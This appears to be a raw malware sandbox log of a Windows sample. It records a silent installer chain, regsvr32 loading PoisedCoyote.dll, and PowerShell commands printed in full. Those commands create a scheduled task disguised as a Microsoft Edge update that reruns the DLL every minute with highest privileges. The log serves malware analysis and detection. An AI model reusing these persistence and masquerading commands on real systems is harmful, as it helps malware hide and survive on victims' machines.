Source: file.exe, 00000000.00000003.1748200530.00000000025E2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.1748510327.000000007FE3E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine Classification label: mal80.evad.winEXE@26/24@1/2
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFDFB211C60 GetDiskFreeSpaceExW
Source: C:\Windows\System32\regsvr32.exe Code function: 16_2_00007FFDFB214380 CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp File created: C:\Users\user\AppData\Local\unins000.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\JL55FnNsh@T5
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-B2398.tmp
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: pdh.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: propsys.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: netutils.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: samcli.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: perfos.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wininet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rasman.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: schannel.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: pdh.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: propsys.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: netutils.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: samcli.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: perfos.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
